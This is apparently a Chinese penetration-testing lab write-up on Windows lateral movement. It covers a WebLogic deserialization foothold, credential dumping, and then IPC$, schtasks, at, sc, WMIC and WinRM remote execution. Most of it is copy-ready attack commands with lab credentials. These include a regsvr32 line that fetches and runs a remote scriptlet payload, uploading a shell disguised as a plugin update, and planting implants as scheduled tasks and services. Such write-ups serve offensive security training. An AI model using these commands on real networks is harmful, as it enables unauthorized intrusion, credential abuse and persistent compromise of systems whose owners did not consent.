横向移动

/01 IPC+Schtasks

一,IPC$简介

IPC$ (Internet Process Connection) 是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通 过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程 计算机的访问。

二,利用条件

  1. 开发端口139,445端口
  2. 目标开启IPC$文件共享服务
  3. 需要目标机器的管理员账号和密码

依旧是前期的信息收集:知道WEB一个IP进行nmap探测对方开放端口

image-20201218142214075

开发了7001可能是weblogin:

image-20201218142436612

老版本的weblogin11g,尝试下反序列化: CVE-2019-2725

image-20201218142634215

再将payload转移到CS上面hashdump,msf的获取域内shell:getsystem有点问题(后来证实payload选择windows/x64/meter,而不是windows/meter)。cs就很好用使用payload_injured模块

image-20201218151521641

得到了密码下面就可以进行横向移动了。

先进行内网探测

探测出有10.10.10.201和10.10.10.80

三,常用命令

1.连接

1
net use \\10.10.10.201\ipc$ /user:administrator "!QAZ2wsx"

image-20201218162049096

2.查看连接情况

1
net use

image-20201218162702099

3.查看目标主机时间

1
net time \\10.10.10.201

image-20201218162713802

4.删除连接

1
net use \\10.10.10.201\ipc$ /del

image-20201218163156384

5.文件上传下载

1
2
copy shell.exe \\10.10.10.201\c$\windows\temp\plugin_update.exe
copy \\10.10.10.201\c$\59.exe c:\

四,Schtasks

允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任务 /Create 创建新计划任务。

/Delete 删除计划任务。

/Query 显示所有计划任务。

/Change 更改计划任务属性。

/Run 按需运行计划任务。

/End 中止当前正在运行的计划任务。

/ShowSid 显示与计划的任务名称相应的安全标识符。

/? 显示此帮助消息。

五,IPC+Schtasks

net连接

1
net use \\10.10.10.201\ipc$ /user:administrator "!QAZ2wsx"

查看c盘目录

1
dir \\10.10.10.201\c$

image-20201218171553574

Copy上传文件

1
copy c:\windows\temp\808888.exe \\10.10.10.201\c$

image-20201218171518782

Schtasks定制周期任务

1
schtasks /create /s 10.10.10.201 /u de1ay\administrator /p "!QAZ2wsx" /sc MINUTE /mo 1 /tn test2 /tr "c:\1288888.exe"

image-20201218172038939

image-20201218222215376

Schtasks删除周期任务

1
schtasks /delete /s 10.10.10.201 /tn test2

meterpreter拿到的shell执行这个不知道为什么会卡住

六,IPC+AT

net连接

1
net use \\10.10.10.201\ipc$ /user:administrator "!QAZ2wsx"

image-20201219145723225

at

1
2
net time \\10.10.10.201
at \\10.10.10.201 19:08 c:\8088888.exe

image-20201219145913738

image-20201219150606274

但是在powershell里运行就很成功就很奇妙了

image-20201219150059755

image-20201219150435557

注意:at 在windows server 2012等新版系统中已被弃用

/02 IPC+SC

net连接

1
net use \\10.10.10.201\ipc$ /user:administrator "!QAZ2wsx"

sc创建服务执行

1
2
3
sc \\10.10.10.201 create test3 binpath= "c:\808888.exe" obj= "de1ay\administrator" password= "!QAZ2wsx"

sc \\10.10.10.201 start test3

这种传教服务和reg创建服务格式都是binpath= “”等号后面有个空格

image-20201218223722962

删除

1
sc \\10.10.10.201 qc test

image-20201218224223142

/03 WMIC

1
wmic /node:10.10.10.201 /user:administrator /password:1qaz@WSX3e process call create "regsvr32 /s /n /u /i:http://192.168.78.128:8080/feY7nzY.sct scrobj.dll"

由于我设置了PC处于内网不能访问192.168.78.128只能访问10.10.10.0/24所以就不能这么实现了,上马方式就是regsvr32去运行我们网站上的getshell。

process all create 创建一个进程(process进程管理)

wmic命令缺点是没有回显,可以使用wmiexec.vbs脚本实现回显。

1
wmic /node:10.10.10.201 /user:administrator /password:!QAZ2wsx process call create "cmd /c calc.exe"

image-20201218225416025

ProcessID为创建进程的PID,

所以内网环境中比较建议使用上传马的把calc换成我们的马。

/04 WinRM

一,WinRM简介

WinRM 指的是Windows远程管理服务,通过远程连接winRM模块可以操作windows命令行,默认监听端口 5985(HTTP)&5986 (HTTPS),在2012及以后默认开启。

二,开启WinRM

判断是否开启WinRM服务

1
winrm enumerate winrm/config/listener

image-20201218225946474

命令开启WinRM服务:

1
winrm quickconfig

image-20201218231503196

环境问题(lll¬ω¬)在我的反复调试,百般爱护下终于好了

image-20201219161329652

image-20201219162501718

允许远程主机访问及访问远程主机

1
winrm set winrm/config/client @{TrustedHosts="*"}

image-20201218231904211

image-20201219162448286

三,Winrs执行命令

1
winrs -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx ipconfig

image-20201218232233732

image-20201219162948254

四,WinRM横向移动

利用winrm参数选项中的invoke参数,来对目标对象执行特定的方法。

1
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"} 

image-20201219163507692

命令调用了Windows WMI中Win32_process类的Create方法,生成了一个calc.exe的新进程

image-20201218232511723

在远程机器上打开进程

1
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"} -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx

image-20201219163452060

在远程机器上创建服务

1
winrm invoke Create wmicimv2/Win32_Service @{Name="test5";DisplayName="test5";PathName="cmd.exe /k c:\1288888.exe"} -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx

在远程机器上启动服务

1
winrm invoke StartService wmicimv2/Win32_Service?Name=test -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx

image-20201219164417833